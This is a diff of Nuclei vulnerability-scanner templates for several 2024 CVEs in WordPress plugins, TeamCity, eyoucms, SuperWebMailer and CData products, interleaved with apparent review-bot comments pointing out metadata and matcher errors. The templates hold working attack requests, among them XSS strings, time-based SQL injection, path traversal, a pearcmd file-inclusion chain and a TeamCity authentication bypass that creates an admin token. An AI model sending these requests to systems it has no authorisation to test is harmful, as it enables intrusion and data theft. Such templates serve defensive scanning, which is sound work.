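Review bot: The request body carries a fixed `exnonce=5a988a925a`, and nothing in the template says why a constant is acceptable. WordPress nonces are normally derived from per-site secrets and expire, so if the plugin validates this field the check would give a false negative on every site except the one it was recorded on. Please add a comment above the raw request stating whether the vulnerable code path ignores `exnonce`, or note the limitation in `description`. The body matcher would also be easier to review with a comment explaining why `"dashboard_shield"`, `"shield_action"` and `"search_shield"` appear only when `icwp-wpsf.php` has been included.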
|
|
@ -0,0 +1,58 @@
|
|||
id: CVE-2024-0235
|
||||
|
||||
info:
|
||||
name: EventON (Free < 2.2.8, Premium < 4.5.5) - Information Disclosure
|
||||
author: princechaddha
|
||||
severity: medium
|
||||
description: |
|
||||
The EventON WordPress plugin before 4.5.5, EventON WordPress plugin before 2.2.7 do not have authorization in an AJAX action, allowing unauthenticated users to retrieve email addresses of any users on the blog.
|
||||
impact: |
|
||||
An attacker could potentially access sensitive email information.
|
||||
remediation: |
|
||||
Update to the latest version of the EventON WordPress Plugin to mitigate CVE-2024-0235.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/e370b99a-f485-42bd-96a3-60432a15a4e9/
|
||||
- https://github.com/fkie-cad/nvd-json-data-feeds
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2024-0235
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
|
||||
cvss-score: 5.3
|
||||
cve-id: CVE-2024-0235
|
||||
cwe-id: CWE-862
|
||||
epss-score: 0.00052
|
||||
epss-percentile: 0.19233
|
||||
cpe: cpe:2.3:a:myeventon:eventon:*:*:*:*:*:wordpress:*:*
|
||||
metadata:
|
||||
vendor: myeventon
|
||||
product: eventon
|
||||
framework: wordpress
|
||||
shodan-query: vuln:CVE-2023-2796
|
||||
fofa-query: wp-content/plugins/eventon/
|
||||
publicwww-query: "/wp-content/plugins/eventon/"
|
||||
tags: cve,cve2024,wp,wordpress,wp-plugin,exposure,eventon,wpscan
|
||||
|
||||
http:
|
||||
- method: POST
|
||||
path:
|
||||
- "{{BaseURL}}/wp-admin/admin-ajax.php?action=eventon_get_virtual_users"
|
||||
|
||||
headers:
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
body: "_user_role=administrator"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '@'
|
||||
- 'status":"good'
|
||||
- 'value='
|
||||
- '"content":'
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# digest: 4b0a00483046022100dd24c1d6e69e4b09cfdd6e18d844c71fecf98df6be105ce2f3645b85146d64be0221009bd6cb83542aa43265c7f18b56ac9f07610b6cee11eafbf574dfb9dc05e30d88:922c64590222798bb761d5b6d8e72950
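Review bot: `shodan-query: vuln:CVE-2023-2796` names a different CVE from the one this template covers, which looks like a leftover from another EventON template. Anyone using the query to inventory affected assets would be looking at the wrong issue. Since `fofa-query` and `publicwww-query` already fingerprint the plugin path, I would drop the line or replace it with a product fingerprint. The `name` also says `Free < 2.2.8` while the description says `before 2.2.7`, so one of the two needs correcting against the advisory.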
|
|
@ -0,0 +1,55 @@
|
|||
id: CVE-2024-0881
|
||||
|
||||
info:
|
||||
name: Combo Blocks < 2.2.76 - Improper Access Control
|
||||
author: Kazgangap
|
||||
severity: medium
|
||||
description: |
|
||||
The Post Grid, Form Maker, Popup Maker, WooCommerce Blocks, Post Blocks, Post Carousel WordPress plugin before 2.2.76 does not prevent password protected posts from being displayed in the result of some unauthenticated AJAX actions, allowing unauthenticated users to read such posts
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/e460e926-6e9b-4e9f-b908-ba5c9c7fb290/
|
||||
- https://github.com/fkie-cad/nvd-json-data-feeds
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2024-0881
|
||||
classification:
|
||||
cve-id: CVE-2024-0881
|
||||
cwe-id: CWE-284
|
||||
epss-score: 0.00043
|
||||
epss-percentile: 0.08268
|
||||
metadata:
|
||||
verified: true
|
||||
max-request: 3
|
||||
publicwww-query: "/wp-content/plugins/user-meta/"
|
||||
tags: cve,cve2024,wp,wpscan,wordpress,wp-plugin,combo-blocks,exposure
|
||||
|
||||
flow: http(1) && http(2)
|
||||
|
||||
http:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/wp-content/plugins/user-meta/readme.txt'
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
internal: true
|
||||
words:
|
||||
- 'User Profile Builder'
|
||||
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/wp-admin/admin-ajax.php?action=post_grid_paginate_ajax_free"
|
||||
- "{{BaseURL}}/wp-admin/admin-ajax.php?action=post_grid_ajax_search_free"
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- '{"html"'
|
||||
- '"<div class='
|
||||
- '"pagination":'
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# digest: 4b0a00483046022100deb3c2cb011969081041e458abc53a53013e5cb05bbe14f59c1faa72c014be17022100ba25e790d6e9b2dc420759b41b40d92f93167855db55d6862f69a8bfae5c740d:922c64590222798bb761d5b6d8e72950
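Review bot: The fingerprint request and the `publicwww-query` both point at `/wp-content/plugins/user-meta/` and match on `User Profile Builder`, which is not the plugin named in `name` and `description` (Combo Blocks / Post Grid). With `flow: http(1) && http(2)` the AJAX checks never run unless that unrelated plugin happens to be installed, so vulnerable sites are missed. The path, the `words` entry and the query should reference the Combo Blocks plugin's own directory and readme title. The second matcher also only shows that the AJAX action returned HTML and pagination, not that a password-protected post was included, which deserves a line in `description`.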
|
|
@ -18,7 +18,7 @@ info:
|
|||
vendor: ivanti
|
||||
product: "connect_secure"
|
||||
shodan-query: "html:\"welcome.cgi?p=logo\""
|
||||
tags: cve,cve2024,kev,xxe,ivanti
|
||||
tags: cve,cve2024,xxe,ivanti
|
||||
|
||||
variables:
|
||||
payload: '<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM
|
||||
|
@ -46,4 +46,4 @@ http:
|
|||
- '/dana-na/'
|
||||
- 'WriteCSS'
|
||||
condition: and
|
||||
# digest: 490a0046304402206a39800bff0d9ca85a05e3686a0e246f8d5504a38e8501a1d7e8684ae6f2853002205ba7c74bb1f99cacf693e8a5a1cd429dcd7e52fab188beb8c95b934e4aabcd57:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4a0a00473045022100b30b610e83925ba39d984d8e235e97014a180a7e945b4a35faec7386faa1b79b022026685bd4cdedbb97d9918ebdd5f362731b82b6368331fc30b6dcbfef0acaccdb:922c64590222798bb761d5b6d8e72950
|
|
@ -0,0 +1,52 @@
|
|||
id: CVE-2024-22927
|
||||
|
||||
info:
|
||||
name: eyoucms v.1.6.5 - Cross-Site Scripting
|
||||
author: ritikchaddha
|
||||
severity: medium
|
||||
description: |
|
||||
Cross Site Scripting (XSS) vulnerability in the func parameter in eyoucms v.1.6.5 allows a remote attacker to run arbitrary code via crafted URL.
|
||||
impact: |
|
||||
Allows attackers to execute malicious scripts on the victim's browser.
|
||||
remediation: |
|
||||
Upgrade eyoucms to version 1.6.6 or later to fix the XSS vulnerability.
|
||||
reference:
|
||||
- https://github.com/weng-xianhu/eyoucms/issues/57
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2024-22927
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.1
|
||||
cve-id: CVE-2024-22927
|
||||
cwe-id: CWE-79
|
||||
epss-score: 0.00064
|
||||
epss-percentile: 0.26844
|
||||
cpe: cpe:2.3:a:eyoucms:eyoucms:1.6.5:*:*:*:*:*:*:*
|
||||
metadata:
|
||||
vendor: eyoucms
|
||||
product: eyoucms
|
||||
fofa-query: title="eyoucms"
|
||||
tags: cve2024,cve,eyoucms,cms,xss
|
||||
|
||||
http:
|
||||
- method: POST
|
||||
path:
|
||||
- "{{BaseURL}}/login.php?a=get_upload_list&c=Uploadimgnew&info=eyJudW0iOiIxXCI%2BPFNjUmlQdCA%2BYWxlcnQoZG9jdW1lbnQuZG9tYWluKTwvU2NSaVB0PiIsInNpemUiOiIyMDk3MTUyIiwiaW5wdXQiOiIiLCJmdW5jIjoiaGVhZF9waWNfY2FsbF9iYWNrIiwicGF0aCI6ImFsbGltZyIsImlzX3dhdGVyIjoiMSIsImFsZyI6IkhTMjU2In0&lang=cn&m=admin&unneed_syn="
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- 'name="num" value="1"><ScRiPt >alert(document.domain)</ScRiPt>'
|
||||
- 'id="eytime"'
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "text/html"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# digest: 490a004630440220478cf55dd8920fb6cef6048870359141244744e6fd3b3fa26652c5c3440ee8080220629a2ff1f955e8ad2147df65ebc9b82b067fbdc5cb27ebbf650f8106928ed172:922c64590222798bb761d5b6d8e72950
|
|
@ -0,0 +1,43 @@
|
|||
id: CVE-2024-2340
|
||||
|
||||
info:
|
||||
name: Avada < 7.11.7 - Information Disclosure
|
||||
author: t3l3machus
|
||||
severity: medium
|
||||
description: |
|
||||
The Avada theme for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 7.11.6 via the '/wp-content/uploads/fusion-forms/' directory. This makes it possible for unauthenticated attackers to extract sensitive data uploaded via an Avada created form with a file upload mechanism.
|
||||
remediation: Fixed in 7.11.7
|
||||
reference:
|
||||
- https://vulners.com/wpvulndb/WPVDB-ID:507E1D07-4953-4A31-81E8-80F01F971E2A
|
||||
- https://avada.com/documentation/avada-changelog/
|
||||
- https://www.wordfence.com/threat-intel/vulnerabilities/id/8db8bbc3-43ca-4ef5-a44d-2987c8597961?source=cve
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2024-2340
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
|
||||
cvss-score: 5.3
|
||||
cve-id: CVE-2024-2340
|
||||
epss-score: 0.00043
|
||||
epss-percentile: 0.08267
|
||||
metadata:
|
||||
verified: true
|
||||
max-request: 1
|
||||
tags: cve,cve2024,wp-theme,wp,wordpress,wpscan,avada,exposure
|
||||
|
||||
http:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/uploads/fusion-forms/"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: regex
|
||||
part: body
|
||||
regex:
|
||||
- '<title>Index of [\s\S]*title>'
|
||||
- 'fusion'
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# digest: 4a0a0047304502210086a9d9e4d491bbdaf66cc96f24d32ffa31c10df273bab32f91385760014d579b022048d3aa9fe3beec267bb552efa870d3ac9644d1501b28f39ab998dbef346ba1dd:922c64590222798bb761d5b6d8e72950
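Review bot: The second regex `'fusion'` is always satisfied when the first one is, because the directory name `fusion-forms` is part of the `Index of` title, so it adds no confidence. The `[\s\S]*` in the first regex also lets the title match span the whole body. A single entry such as `- '<title>Index of /wp-content/uploads/fusion-forms'` states the intent directly. The check reports that directory listing is enabled, which probably depends on web server configuration as much as on theme version, so the description should say that a hit needs the listed files reviewed before it is treated as this CVE.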
|
|
@ -0,0 +1,72 @@
|
|||
id: CVE-2024-23917
|
||||
|
||||
info:
|
||||
name: JetBrains TeamCity > 2023.11.3 - Authentication Bypass
|
||||
author: iamnoooob,rootxharsh,pdresearch
|
||||
severity: critical
|
||||
description: |
|
||||
In JetBrains TeamCity before 2023.11.3 authentication bypass leading to RCE was possible
|
||||
reference:
|
||||
- https://github.com/fkie-cad/nvd-json-data-feeds
|
||||
- https://www.rapid7.com/db/vulnerabilities/jetbrains-teamcity-cve-2024-23917/
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2024-23917
|
||||
cwe-id: CWE-306,CWE-288
|
||||
epss-score: 0.00091
|
||||
epss-percentile: 0.38219
|
||||
cpe: cpe:2.3:a:jetbrains:teamcity:*:*:*:*:*:*:*:*
|
||||
metadata:
|
||||
verified: true
|
||||
max-request: 1
|
||||
vendor: jetbrains
|
||||
product: teamcity
|
||||
tags: cve,cve2024,auth-bypass,teamcity
|
||||
|
||||
flow: http(1) && http(2)
|
||||
|
||||
http:
|
||||
- method: POST
|
||||
path:
|
||||
- "{{BaseURL}}/app/rest/users/id:1/tokens/{{randstr}};.jsp?jsp_precompile=true"
|
||||
headers:
|
||||
Content-Type: "application/x-www-form-urlencoded"
|
||||
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- status_code==200
|
||||
- "contains(content_type,'application/xml')"
|
||||
- 'contains(body,"<token name=\"{{randstr}}\"")'
|
||||
condition: and
|
||||
internal: true
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
part: body
|
||||
name: authtoken
|
||||
internal: true
|
||||
group: 1
|
||||
regex:
|
||||
- 'value="(.+)"'
|
||||
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/app/rest/server"
|
||||
headers:
|
||||
Authorization: "Bearer {{authtoken}}"
|
||||
|
||||
extractors:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- '"Token:" + authtoken'
|
||||
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- "status_code==200"
|
||||
- "contains(content_type,'application/xml')"
|
||||
- "contains(body,'<projects href=')"
|
||||
condition: and
|
||||
# digest: 4b0a00483046022100f2ab25f2474d2b66f27eac34cf59dd749516c75af1ec18933a8a2040ed0661a2022100b5fe19d35dcd8e849f3543cdde3db3a38866b8f64bf3c216f156ec0daabf27c0:922c64590222798bb761d5b6d8e72950
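Review bot: The first request creates an access token for `id:1` on the scanned server, and the extractor in the second request writes it to the results as `"Token:" + authtoken`. A successful scan therefore leaves a live credential on the target and in every report, log and ticket the finding is copied into. I would remove that `dsl` extractor, since the matcher already proves the token worked, and add a line to `description` telling the operator to delete the `{{randstr}}` token afterwards. The `name` says `> 2023.11.3` while the description says `before 2023.11.3`, so it should read `< 2023.11.3`, and `max-request: 1` should be 2. The capture `value="(.+)"` is greedy; `value="([^"]+)"` avoids swallowing later attributes on the same line.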
|
|
@ -0,0 +1,50 @@
|
|||
id: CVE-2024-24131
|
||||
|
||||
info:
|
||||
name: SuperWebMailer 9.31.0.01799 - Cross-Site Scripting
|
||||
author: DhiyaneshDK
|
||||
severity: medium
|
||||
description: |
|
||||
SuperWebMailer v9.31.0.01799 was discovered to contain a reflected cross-site scripting (XSS) vulenrability via the component api.php.
|
||||
reference:
|
||||
- https://github.com/fkie-cad/nvd-json-data-feeds
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2024-24131
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.1
|
||||
cve-id: CVE-2024-24131
|
||||
cwe-id: CWE-79
|
||||
epss-score: 0.00046
|
||||
epss-percentile: 0.15655
|
||||
cpe: cpe:2.3:a:superwebmailer:superwebmailer:9.31.0.01799:*:*:*:*:*:*:*
|
||||
metadata:
|
||||
verified: true
|
||||
max-request: 1
|
||||
shodan-query: title:"SuperWebMailer"
|
||||
vendor: superwebmailer
|
||||
product: superwebmailer
|
||||
tags: cve,cve2024,superwebmailer,xss
|
||||
|
||||
http:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/api/api.php/<script>alert(document.domain)</script>"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "<script>alert(document.domain)</script>"
|
||||
- "SuperWebMailerAPI"
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "text/html"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# digest: 4b0a00483046022100a70e9370453935e96c9943ac035762c4f44bcaef30ad4b00ec48e58072ccfb00022100c2c66dd4e2b80a25bc7b8730d7f65343a45419533e5a521290e890f52352af77:922c64590222798bb761d5b6d8e72950
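Review bot: `description` misspells the key term as `vulenrability`; it should read `reflected cross-site scripting (XSS) vulnerability via the component api.php`. The description is copied into scan reports and search indexes, so the typo makes the finding harder to locate by keyword.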
|
|
@ -0,0 +1,48 @@
|
|||
id: CVE-2024-27956
|
||||
|
||||
info:
|
||||
name: WordPress Automatic Plugin <= 3.92.0 - SQL Injection
|
||||
author: DhiyaneshDK
|
||||
severity: critical
|
||||
description: |
|
||||
The Automatic plugin for WordPress is vulnerable to SQL Injection in versions up to, and including, 3.92.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
|
||||
remediation: |
|
||||
Update to version 3.92.1 or later.
|
||||
reference:
|
||||
- https://github.com/truonghuuphuc/CVE-2024-27956
|
||||
- https://patchstack.com/database/vulnerability/wp-automatic/wordpress-automatic-plugin-3-92-0-unauthenticated-arbitrary-sql-execution-vulnerability?_s_id=cve
|
||||
- https://github.com/NaInSec/CVE-LIST
|
||||
- https://github.com/nomi-sec/PoC-in-GitHub
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2024-27956
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:H/A:L
|
||||
cvss-score: 9.9
|
||||
cve-id: CVE-2024-27956
|
||||
cwe-id: CWE-89
|
||||
epss-score: 0.00043
|
||||
epss-percentile: 0.08203
|
||||
metadata:
|
||||
verified: true
|
||||
max-request: 1
|
||||
publicwww-query: "wp-content/plugins/wp-automatic"
|
||||
tags: cve,cve2024,sqli,wordpress,wpscan,wp-automatic
|
||||
|
||||
http:
|
||||
- raw:
|
||||
- |
|
||||
@timeout: 20s
|
||||
POST /wp-content/plugins/wp-automatic/inc/csv.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
q=SELECT IF(1=1,sleep(5),sleep(0));&auth=%00&integ=dc9b923a00f0e449c3b401fb0d7e2fae
|
||||
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'duration>=5'
|
||||
- 'status_code == 200'
|
||||
- 'contains(header, "application/csv")'
|
||||
- 'contains_all(body, "DATE", "ACTION", "KEYWORD")'
|
||||
condition: and
|
||||
# digest: 4a0a0047304502201afc1791826e1697d3a3aa1c115b03d228037f7e7725cbc1dc25dc3f37fb6798022100d14a7854e82d1afb46b5a04a8b6c429cf8ab2b7ce9fe9c11967a23d4519f7986:922c64590222798bb761d5b6d8e72950
|
|
@ -0,0 +1,36 @@
|
|||
id: CVE-2024-2876
|
||||
|
||||
info:
|
||||
name: Wordpress Email Subscribers by Icegram Express - SQL Injection
|
||||
author: iamnoooob,rootxharsh,pdresearch
|
||||
severity: critical
|
||||
description: |
|
||||
The Email Subscribers by Icegram Express - Email Marketing, Newsletters, Automation for WordPress & WooCommerce plugin for WordPress is vulnerable to SQL Injection via the 'run' function of the 'IG_ES_Subscribers_Query' class in all versions up to, and including, 5.7.14 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
|
||||
reference:
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2024-2876
|
||||
- https://www.wordfence.com/blog/2024/04/1250-bounty-awarded-for-unauthenticated-sql-injection-vulnerability-patched-in-email-subscribers-by-icegram-express-wordpress-plugin/
|
||||
metadata:
|
||||
verified: true
|
||||
max-request: 1
|
||||
publicwww-query: "/wp-content/plugins/email-subscribers/"
|
||||
tags: cve,cve2024,wp,wordpress,wp-plugin,sqli,email-subscribers,wpscan
|
||||
|
||||
http:
|
||||
- raw:
|
||||
- |
|
||||
@timeout: 20s
|
||||
POST /wp-admin/admin-post.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
page=es_subscribers&is_ajax=1&action=_sent&advanced_filter[conditions][0][0][field]=status=99924)))union(select(sleep(4)))--+&advanced_filter[conditions][0][0][operator]==&advanced_filter[conditions][0][0][value]=1111
|
||||
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'duration>=4'
|
||||
- 'status_code == 200'
|
||||
- 'contains(header, "application/json")'
|
||||
- 'contains_all(body, "bulk_action", "_sent", "errortype")'
|
||||
condition: and
|
||||
# digest: 4a0a00473045022100817fb9b3e4ea49e7dbe5e57d8b5e04f4325b5d104def6e85aed38a448372bbe002207bd138ea4becb7377be2c0d77ca9bf30101280e1e917339800ad3cc99954c2d6:922c64590222798bb761d5b6d8e72950
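Review bot: The `info` block has no `classification` section, so this template carries no `cve-id`, CVSS or CWE data even though its `id` and tags mark it as a CVE check. Tooling that groups or prioritises findings by those fields will treat it as unclassified. At minimum add `classification:` with `cve-id: CVE-2024-2876` and `cwe-id: CWE-89`, and fill the CVSS fields from the NVD entry already listed under `reference`. The tags also include `wpscan`, but no WPScan advisory is referenced.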
|
|
@ -0,0 +1,63 @@
|
|||
id: CVE-2024-3136
|
||||
|
||||
info:
|
||||
name: MasterStudy LMS <= 3.3.3 - Unauthenticated Local File Inclusion via template
|
||||
author: iamnoooob,rootxharsh,pdresearch
|
||||
severity: critical
|
||||
description: The MasterStudy LMS plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 3.3.3 via the 'template' parameter. This makes it possible for unauthenticated attackers to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other "safe" file types can be uploaded and included.
|
||||
impact: |
|
||||
An attacker can read sensitive files, execute arbitrary code, or escalate privileges.
|
||||
remediation: |
|
||||
Upgrade MasterStudy LMS to version 3.3.4 or higher to mitigate the vulnerability.
|
||||
reference:
|
||||
- https://plugins.trac.wordpress.org/changeset/3064337/masterstudy-lms-learning-management-system/trunk/_core/lms/classes/helpers.php
|
||||
- https://plugins.trac.wordpress.org/changeset/3064337/masterstudy-lms-learning-management-system/trunk/_core/lms/classes/templates.php
|
||||
- https://www.wordfence.com/threat-intel/vulnerabilities/id/9a573740-cdfe-4b58-b33b-5e50bcbc4779?source=cve
|
||||
- https://github.com/drdry2/CVE-2024-3136-Wordpress-RCE
|
||||
- https://github.com/nomi-sec/PoC-in-GitHub
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2024-3136
|
||||
epss-score: 0.00045
|
||||
epss-percentile: 0.14274
|
||||
metadata:
|
||||
publicwww-query: "/wp-content/plugins/masterstudy-lms-learning-management-system"
|
||||
verified: true
|
||||
max-request: 2
|
||||
tags: cve,cve2024,wp,wordpress,unauth,lfi
|
||||
|
||||
variables:
|
||||
randomstr: "{{randstr_1}}"
|
||||
marker: "{{base64(randomstr)}}"
|
||||
|
||||
http:
|
||||
- raw:
|
||||
- |
|
||||
GET /?p=1 HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
- |
|
||||
POST /wp-admin/admin-ajax.php?template=../../../../../../../../usr/local/lib/php/pearcmd&+config-create HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
action=stm_lms_load_content&nonce={{nonce}}&
|
||||
|
||||
host-redirects: true
|
||||
max-redirects: 2
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'contains(to_lower(body_2),"config-create: must have 2 parameters")'
|
||||
- 'status_code_2 == 200'
|
||||
condition: and
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
part: body
|
||||
regex:
|
||||
- '"load_content":"(\w+?)"'
|
||||
group: 1
|
||||
internal: true
|
||||
name: nonce
|
||||
# digest: 4a0a0047304502206e33a2d814c15125c07d788ddd3fa86d8d8c00963ff4ee67ee6978b537395c2e022100c3dbee7b576104e81ce534ed2e9bcce2296b7a6ffeca66acde35e5d081bb93d6:922c64590222798bb761d5b6d8e72950
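Review bot: The `variables` block defines `randomstr` and `marker`, but neither is referenced by the two raw requests or by the matcher, so both are dead and can be dropped. The check also depends on one fixed location for `pearcmd`; on hosts where PHP is installed elsewhere the template reports nothing, so a clean result should not be read as "not vulnerable". A one-line comment above the second request would tell whoever triages scan output, e.g. `# a negative result is inconclusive when pearcmd is not at this path`.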
|
|
@ -0,0 +1,63 @@
|
|||
id: CVE-2024-31849
|
||||
|
||||
info:
|
||||
name: CData Connect < 23.4.8846 - Path Traversal
|
||||
author: DhiyaneshDK
|
||||
severity: critical
|
||||
description: |
|
||||
A path traversal vulnerability exists in the Java version of CData Connect < 23.4.8846 when running using the embedded Jetty server, which could allow an unauthenticated remote attacker to gain complete administrative access to the application.
|
||||
reference:
|
||||
- https://www.tenable.com/security/research/tra-2024-09
|
||||
- https://www.cdata.com/kb/entries/jetty-cve-0324.rst
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2024-31849
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2024-31849
|
||||
cwe-id: CWE-22
|
||||
epss-score: 0.00044
|
||||
epss-percentile: 0.09652
|
||||
metadata:
|
||||
verified: true
|
||||
max-request: 1
|
||||
shodan-query: title:"CData Connect"
|
||||
tags: cve,cve2024,cdata,lfi
|
||||
|
||||
flow: http(1) && http(2)
|
||||
|
||||
http:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/login.rst'
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
internal: true
|
||||
words:
|
||||
- 'CData - Connect'
|
||||
|
||||
- raw:
|
||||
- |
|
||||
GET /ui/..\src\getSettings.rsb?@json HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Referer: {{RootURL}}
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '"items":[{'
|
||||
- ':"true"'
|
||||
- 'notifyemail'
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- 'application/json'
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# digest: 4a0a0047304502206306def4e2e9bd849a9223859d49dc3876b05ac689c4018361bce890427600d7022100f74718e6db0689ac6ce5206fc0b57545354477d87c84d0b8c6d3a3ff7524fdce:922c64590222798bb761d5b6d8e72950
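Review bot: `max-request: 1` under `metadata` does not match the template, which issues two requests (the `login.rst` fingerprint and the `getSettings.rsb` request, joined by `flow: http(1) && http(2)`); it should read `max-request: 2`. The same mismatch is in the CVE-2024-31850 and CVE-2024-31851 templates that follow. In all three the body matcher word `':"true"'` is generic, so `notifyemail` is doing most of the work; a short comment naming the settings response the matcher expects would make that intent clear.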
|
|
@ -0,0 +1,62 @@
|
|||
id: CVE-2024-31850
|
||||
|
||||
info:
|
||||
name: CData Arc < 23.4.8839 - Path Traversal
|
||||
author: DhiyaneshDK
|
||||
severity: high
|
||||
description: |
|
||||
A path traversal vulnerability exists in the Java version of CData Arc < 23.4.8839 when running using the embedded Jetty server, which could allow an unauthenticated remote attacker to gain access to sensitive information and perform limited actions.
|
||||
reference:
|
||||
- https://www.tenable.com/security/research/tra-2024-09
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2024-31850
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L
|
||||
cvss-score: 8.6
|
||||
cve-id: CVE-2024-31850
|
||||
cwe-id: CWE-22
|
||||
epss-score: 0.00044
|
||||
epss-percentile: 0.09773
|
||||
metadata:
|
||||
verified: true
|
||||
max-request: 1
|
||||
shodan-query: title:"CData Arc"
|
||||
tags: cve,cve2024,cdata,lfi
|
||||
|
||||
flow: http(1) && http(2)
|
||||
|
||||
http:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/login.rst'
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
internal: true
|
||||
words:
|
||||
- '<title>CData Arc'
|
||||
|
||||
- raw:
|
||||
- |
|
||||
GET /ui/..\src\getSettings.rsb?@json HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Referer: {{RootURL}}
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '"items":[{'
|
||||
- ':"true"'
|
||||
- 'notifyemail'
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- 'application/json'
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# digest: 4a0a00473045022100a90aacad9d50c7b4f889f1ea7226b29388df438d5644c28822dc4a2715f9490502200ea6c2b15395f98c3499bf87ddb3dea4f98de351105b8418254967fc47e7c3aa:922c64590222798bb761d5b6d8e72950
|
|
@ -0,0 +1,62 @@
|
|||
id: CVE-2024-31851
|
||||
|
||||
info:
|
||||
name: CData Sync < 23.4.8843 - Path Traversal
|
||||
author: DhiyaneshDK
|
